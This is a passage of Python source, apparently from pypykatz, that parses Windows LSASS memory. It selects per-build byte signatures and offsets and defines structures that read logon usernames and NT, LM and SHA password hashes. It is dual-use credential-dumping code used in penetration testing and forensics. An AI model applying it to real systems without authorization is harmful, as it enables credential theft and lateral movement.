template.encrypted_credential_struct = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC
template.log_template('encrypted_credential_struct', template.encrypted_credential_struct)
#identify credential session list structure to be used
if sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
template.list_entry = PKIWI_MSV1_0_LIST_51
elif sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
template.list_entry = PKIWI_MSV1_0_LIST_52
elif sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
template.list_entry = PKIWI_MSV1_0_LIST_60
elif sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
#do not do that :)
if sysinfo.msv_dll_timestamp > 0x53480000:
template.list_entry = PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ
else:
template.list_entry = PKIWI_MSV1_0_LIST_61
elif sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
#template.list_entry = PKIWI_MSV1_0_LIST_62
if sysinfo.msv_dll_timestamp > 0x53480000:
template.list_entry = PKIWI_MSV1_0_LIST_63
else:
template.list_entry = PKIWI_MSV1_0_LIST_62
else:
template.list_entry = PKIWI_MSV1_0_LIST_63
template.log_template('list_entry', template.list_entry)
if sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_DEC
elif sysinfo.buildnumber < WindowsBuild.WIN_10_1511.value:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC
elif sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_DEC
else:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC
template.log_template('decrypted_credential_struct', template.decrypted_credential_struct)
if sysinfo.architecture == KatzSystemArchitecture.X64:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
template.signature = b'\x4c\x8b\xdf\x49\xc1\xe3\x04\x48\x8b\xcb\x4c\x03\xd8'
template.first_entry_offset = -4
template.offset2 = 0
elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
template.signature = b'\x4c\x8b\xdf\x49\xc1\xe3\x04\x48\x8b\xcb\x4c\x03\xd8'
template.first_entry_offset = -4
template.offset2 = -45
elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
template.signature = b'\x33\xff\x45\x85\xc0\x41\x89\x75\x00\x4c\x8b\xe3\x0f\x84'
template.first_entry_offset = 21#-4
template.offset2 = -4
elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
template.signature = b'\x33\xf6\x45\x89\x2f\x4c\x8b\xf3\x85\xff\x0f\x84'
template.first_entry_offset = 19
template.offset2 = -4
elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
template.first_entry_offset = 16
template.offset2 = -4
elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
template.signature = b'\x8b\xde\x48\x8d\x0c\x5b\x48\xc1\xe1\x05\x48\x8d\x05'
template.first_entry_offset = 36
template.offset2 = -6
elif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1703.value:
#1503 and 1603
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
template.first_entry_offset = 16
template.offset2 = -4
elif WindowsBuild.WIN_10_1703.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1803.value:
#1703
template.signature = b'\x33\xff\x45\x89\x37\x48\x8b\xf3\x45\x85\xc9\x74'
template.first_entry_offset = 23
template.offset2 = -4
elif WindowsBuild.WIN_10_1803.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1903.value:
#1803
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc9\x74'
template.first_entry_offset = 23
template.offset2 = -4
else:
#1903
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
template.first_entry_offset = 23
template.offset2 = -4
elif sysinfo.architecture == KatzSystemArchitecture.X86:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
template.signature = b'\xff\x50\x10\x85\xc0\x0f\x84'
template.first_entry_offset = 24
template.offset2 = 0
elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
template.signature = b'\x89\x71\x04\x89\x30\x8d\x04\xbd'
template.first_entry_offset = -11
template.offset2 = -43
elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
template.signature = b'\x89\x71\x04\x89\x30\x8d\x04\xbd'
template.first_entry_offset = -11
template.offset2 = -42
elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
template.signature = b'\x8b\x45\xf8\x8b\x55\x08\x8b\xde\x89\x02\x89\x5d\xf0\x85\xc9\x74'
template.first_entry_offset = 18
template.offset2 = -4
elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
template.signature = b'\x8b\x4d\xe4\x8b\x45\xf4\x89\x75\xe8\x89\x01\x85\xff\x74'
template.first_entry_offset = 16
template.offset2 = -4
elif sysinfo.buildnumber >= WindowsBuild.WIN_10_1507.value:
template.signature = b'\x8b\x4d\xe8\x8b\x45\xf4\x89\x75\xec\x89\x01\x85\xff\x74'
template.first_entry_offset = 16
template.offset2 = -4
else:
raise Exception('Could not identify template! sysinfo.buildnumber: %d' % sysinfo.buildnumber)
else:
raise Exception('Unknown Architecture: %s , Build number %s' % (sysinfo.architecture, sysinfo.buildnumber))
return template
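# Illustrative usage sketch (not part of the original pypykatz source): get_template only
# reads sysinfo.architecture, sysinfo.buildnumber and sysinfo.msv_dll_timestamp, so a minimal
# stand-in object is enough to see which structures it would select. The SimpleNamespace
# object below is an assumption for illustration, not the real KatzSystemInfo type.
#
# from types import SimpleNamespace
# fake_sysinfo = SimpleNamespace(
# architecture=KatzSystemArchitecture.X64,
# buildnumber=WindowsBuild.WIN_10_1507.value,
# msv_dll_timestamp=0,
# )
# template = MsvTemplate.get_template(fake_sysinfo)
# # expected selection: list_entry = PKIWI_MSV1_0_LIST_63,
# # decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC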
class MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC:
#this structure doesn't have a username or domain name, but it does have credentials :S
#starts with
size = 0x60
def __init__(self):
self.unk1 = None
self.unk2 = None
self.unk_tag = None
self.unk_remaining_size = None
self.LengthOfNtOwfPassword = None
self.NtOwfPassword = None
self.LengthOfShaOwfPassword = None
self.ShaOwPassword = None
self.LogonDomainName = None
self.UserName = None
self.LmOwfPassword = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC()
res.unk1 = await USHORT.loadvalue(reader)
res.unk2 = await USHORT.loadvalue(reader)
res.unk_tag = await reader.read(4) #0xcccccc
res.unk_remaining_size = await ULONG.loadvalue(reader)
await reader.read(40)
res.LengthOfNtOwfPassword = await ULONG.loadvalue(reader)
res.NtOwfPassword = await reader.read(16)
res.LengthOfShaOwfPassword = await ULONG.loadvalue(reader)
res.ShaOwPassword = await reader.read(20)
res.LogonDomainName = None
res.UserName = None
res.LmOwfPassword = None
res.isNtOwfPassword = None
res.isLmOwfPassword = None
res.isShaOwPassword = None
return res
class MSV1_0_PRIMARY_CREDENTIAL_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
return res
class MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.isIso = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
self.align0 = None
self.align1 = None
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.isIso = await BOOLEAN.loadvalue(reader)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
res.align0 = await BYTE.loadvalue(reader)
res.align1 = await BYTE.loadvalue(reader)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
return res
class MSV1_0_PRIMARY_CREDENTIAL_10_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.isIso = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
self.align0 = None
self.align1 = None
self.align2 = None
self.align3 = None
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_10_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.isIso = await BOOLEAN.loadvalue(reader)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
res.align0 = await BYTE.loadvalue(reader)
res.align1 = await BYTE.loadvalue(reader)
res.align2 = await BYTE.loadvalue(reader)
res.align3 = await BYTE.loadvalue(reader)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
return res
class MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.pNtlmCredIsoInProc = None
self.isIso = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
self.isDPAPIProtected = None
self.align0 = None
self.align1 = None
self.align2 = None
self.unkD = None
# stuff to be done! #pragma pack(push, 2)
self.isoSize = None
self.DPAPIProtected = None
self.align3 = None
# stuff to be done! #pragma pack(pop)
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.pNtlmCredIsoInProc = await PVOID.loadvalue(reader)
res.isIso = await BOOLEAN.loadvalue(reader)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
res.isDPAPIProtected = await BOOLEAN.loadvalue(reader)
res.align0 = await BYTE.loadvalue(reader)
res.align1 = await BYTE.loadvalue(reader)
res.align2 = await BYTE.loadvalue(reader)
res.unkD = await DWORD.loadvalue(reader) # // 1/2
# stuff to be done! #pragma pack(push, 2)
res.isoSize = await WORD.loadvalue(reader) #// 0000
res.DPAPIProtected = await reader.read(16)
res.align3 = await DWORD.loadvalue(reader) #// 00000000
# stuff to be done! #pragma pack(pop)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
return res
class KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC:
def __init__(self):
self.Flink = None
self.Primary = None
self.encrypted_credentials = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC()
res.Flink = await PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC.load(reader)
res.Primary = await ANSI_STRING.load(reader)
await reader.align()
res.encrypted_credentials = await LSA_UNICODE_STRING.load(reader)
return res
class PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC
return p
#class PKIWI_MSV1_0_CREDENTIAL_LIST(POINTER):
# def __init__(self, reader):
# super().__init__(reader, PKIWI_MSV1_0_CREDENTIAL_LIST)
class KIWI_MSV1_0_CREDENTIAL_LIST:
def __init__(self):
self.Flink = None
self.AuthenticationPackageId = None
self.PrimaryCredentials_ptr = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_CREDENTIAL_LIST()
res.Flink = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.AuthenticationPackageId = await DWORD.loadvalue(reader)
await reader.align()
res.PrimaryCredentials_ptr = await PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC.load(reader)
return res
class PKIWI_MSV1_0_CREDENTIAL_LIST(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_CREDENTIAL_LIST()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_CREDENTIAL_LIST
return p
class PKIWI_MSV1_0_LIST_51(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_51()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_51
return p
class KIWI_MSV1_0_LIST_51:
def __init__(self):
self.Flink = None
self.Blink = None
self.LocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk0 = None
self.unk1 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_51()
res.Flink = await PKIWI_MSV1_0_LIST_51.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_51.load(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
await reader.align()
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await ULONG.loadvalue(reader)
await reader.align()
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await PVOID.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_52(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_52()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_52
return p
class KIWI_MSV1_0_LIST_52:
def __init__(self):
self.Flink = None
self.Blink = None
self.LocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk0 = None
self.unk1 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_52()
res.Flink = await PKIWI_MSV1_0_LIST_52.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_52.load(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await ULONG.loadvalue(reader)
await reader.align()
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_60(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_60()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_60
return p
class KIWI_MSV1_0_LIST_60:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_60()
res.Flink = await PKIWI_MSV1_0_LIST_60.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_60.load(reader)
await reader.align()
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
await reader.align()
res.unk7 = await PVOID.loadvalue(reader)
await reader.align()
res.hSemaphore8 = await HANDLE.loadvalue(reader)
await reader.align()
res.unk9 = await PVOID.loadvalue(reader)
await reader.align()
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
await reader.align()
res.unk13 = await PVOID.loadvalue(reader)
await reader.align()
t = await reader.read(8)
res.LocallyUniqueIdentifier = int.from_bytes(t, byteorder = 'little', signed = False)
t = await reader.read(8)
res.SecondaryLocallyUniqueIdentifier = int.from_bytes(t, byteorder = 'little', signed = False)
await reader.align()
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await ULONG.loadvalue(reader)
await reader.align()
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await PVOID.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_61(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_61()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_61
return p
class KIWI_MSV1_0_LIST_61:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_61()
res.Flink = await PKIWI_MSV1_0_LIST_61.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_61.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ
return p
class KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.waza = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ()
res.Flink = await PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.waza = await reader.read(12)
await reader.align()
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_62(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_62()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_62
return p
class KIWI_MSV1_0_LIST_62:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.Type = None
self.pSid = None
self.LogonType = None
self.unk18 = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.unk24 = None
self.unk25 = None
self.unk26 = None
self.unk27 = None
self.unk28 = None
self.unk29 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_62()
res.Flink = await PKIWI_MSV1_0_LIST_62.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_62.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.Type = await LSA_UNICODE_STRING.load(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
await reader.align()
res.unk18 = await PVOID.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align()
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
